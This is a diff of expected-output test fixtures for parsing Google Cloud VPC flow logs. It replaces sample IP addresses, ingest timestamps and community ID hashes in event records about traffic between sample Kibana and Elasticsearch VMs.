@@ -5794,8 +5794,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868626100Z", - "original": "{\"insertId\":\"bnj3cofh3cdk0\",\"jsonPayload\":{\"bytes_sent\":\"259510\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391465500Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdk0\",\"jsonPayload\":{\"bytes_sent\":\"259510\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075756033Z", "end": "2019-06-14T03:49:59.597279654Z", @@ -5816,9 +5816,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 52260, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -5832,7 +5832,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MlFaFjbkXS6KKyiSbXcNDQJbn8U=", + "community_id": "1:jQQ6l4o1MZQiUFoVCT++dIYahM8=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -5847,7 +5847,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -5871,8 +5871,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868629300Z", - "original": "{\"insertId\":\"bnj3cofh3cdk8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":52260,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391469700Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdk8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":52260,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:11.063146265Z", "end": "2019-06-14T03:42:11.183868408Z", @@ -5893,10 +5893,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -5910,7 +5910,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ZvwQ2j/3ZuFaLSX6WH5V4iy9utU=", + "community_id": "1:IEnrf1LJAN4LjLMkDE8yTRHo3KA=", "bytes": 65069, "name": "default", "transport": "tcp", @@ -5933,7 +5933,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -5969,8 +5969,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868632200Z", - "original": "{\"insertId\":\"bnj3cofh3cdkp\",\"jsonPayload\":{\"bytes_sent\":\"65069\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391475200Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkp\",\"jsonPayload\":{\"bytes_sent\":\"65069\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140119099Z", "end": "2019-06-14T03:49:59.565300944Z", @@ -5991,10 +5991,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -6008,7 +6008,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:88xKud9UZj+uL0CBL+jvBleTFIk=", + "community_id": "1:xlc9p+qqPBlTtvXaxYaz5GAWNls=", "bytes": 60530, "name": "default", "transport": "tcp", @@ -6031,7 +6031,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -6067,8 +6067,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868635600Z", - "original": "{\"insertId\":\"bnj3cofh3cdkc\",\"jsonPayload\":{\"bytes_sent\":\"60530\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"366\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391480800Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkc\",\"jsonPayload\":{\"bytes_sent\":\"60530\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"366\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565335113Z", @@ -6095,18 +6095,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33570, "bytes": 11384, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 86 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:W60ErjE9kT0Dm5xlbB8kttSgelA=", + "community_id": "1:F7T6LmH5wVzEgGnm1LS0ir3ltmg=", "bytes": 11384, "name": "default", "transport": "tcp", @@ -6128,7 +6128,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -6165,8 +6165,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868639200Z", - "original": "{\"insertId\":\"bnj3cofh3cdkm\",\"jsonPayload\":{\"bytes_sent\":\"11384\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"86\",\"reporter\":\"DEST\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391486700Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkm\",\"jsonPayload\":{\"bytes_sent\":\"11384\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"86\",\"reporter\":\"DEST\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469473010Z", "end": "2019-06-14T03:49:51.821047175Z", @@ -6187,10 +6187,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33554, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -6204,7 +6204,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BbRNTmVcGaqf/baRzluKDpJAprQ=", + "community_id": "1:8vM4z84sXvUT94gexJfa2ZSNZ/c=", "bytes": 272063, "name": "default", "transport": "tcp", @@ -6227,7 +6227,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -6263,8 +6263,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868642300Z", - "original": "{\"insertId\":\"bnj3cofh3cdjy\",\"jsonPayload\":{\"bytes_sent\":\"272063\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"247\",\"reporter\":\"SRC\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391492100Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdjy\",\"jsonPayload\":{\"bytes_sent\":\"272063\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"247\",\"reporter\":\"SRC\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143837873Z", "end": "2019-06-14T03:49:59.565131125Z", @@ -6285,9 +6285,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 53706, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -6301,7 +6301,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0BGh5oABRy6JrttDfTSBw1iBDW4=", + "community_id": "1:FnUL58e/2lopFxzyH6NB4ZfRZYg=", "bytes": 1791, "transport": "tcp", "type": "ipv4", @@ -6316,7 +6316,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -6340,8 +6340,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868645300Z", - "original": "{\"insertId\":\"bnj3cofh3cdjv\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":53706,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"43\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391497500Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdjv\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53706,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"43\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:43:50.703302550Z", "end": "2019-06-14T03:43:50.822333871Z", @@ -6368,18 +6368,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33858, "bytes": 18295, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 118 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:DXSnxcLrDyftjOc5jFhwTKkshsM=", + "community_id": "1:FZaxwdeLVaVT2X3mtyj9cQcUk8w=", "bytes": 18295, "name": "default", "transport": "tcp", @@ -6401,7 +6401,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -6438,8 +6438,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868648500Z", - "original": "{\"insertId\":\"bnj3cofh3cdkh\",\"jsonPayload\":{\"bytes_sent\":\"18295\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789039435Z\",\"packets_sent\":\"118\",\"reporter\":\"DEST\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391503Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkh\",\"jsonPayload\":{\"bytes_sent\":\"18295\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789039435Z\",\"packets_sent\":\"118\",\"reporter\":\"DEST\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458515996Z", "end": "2019-06-14T03:49:51.789039435Z", @@ -6466,17 +6466,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33064, "bytes": 1467, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:aT1tuR31uByuIcuxfCbs1kvMBMA=", + "community_id": "1:1YXDYMIDmqablN3iIS5sgm7U7jU=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -6490,7 +6490,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, 
